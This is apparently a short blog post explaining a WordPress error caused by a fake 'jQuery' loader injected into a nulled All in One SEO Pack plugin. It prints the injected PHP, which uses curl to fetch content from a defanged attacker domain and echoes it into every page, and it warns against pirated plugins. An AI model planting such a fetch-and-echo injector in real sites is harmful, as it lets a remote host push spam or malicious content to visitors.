Fixing: "The requested URL /jquery-1.6.3.min.js was not found on this server."
If a WordPress site starts printing this at the top of every page:
Not Found
The requested URL /jquery-1.6.3.min.js was not found on this server.
check whether a plugin is pulling in a fake “jQuery” file. I traced this one to injected code in all_in_one_seo_pack.php:
$url = "hxxp://www.4llw4d[.]freefilesblog[.]com/jquery-1.6.3.min.js"; // defanged; attacker-controlled
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
That is not loading jQuery. It fetches whatever a random domain returns and echoes it straight into the page on every request. The error was just the malware host returning its own 404, printed onto the page in place of the usual payload (normally spam links or hidden SEO content). It rode in on a nulled “Pro” copy of All in One SEO Pack.
Pointing $url at the real code.jquery.com doesn’t fix anything, it just dumps the jQuery source as text onto the page, because the code echoes the response body instead of loading a script. The only real fix is to remove the nulled plugin and install the official free version from the WordPress plugin directory.
Watch out for this pattern: nulled (pirated) WordPress plugins routinely ship with a fetch-and-echo injector disguised as a jQuery loader. Sucuri has a good breakdown in Fake jQuery Scripts in Nulled WordPress Plugins, and All in One SEO publishes its own warning about nulled copies. A free “Pro” plugin isn’t free; the price is remote code running on your server.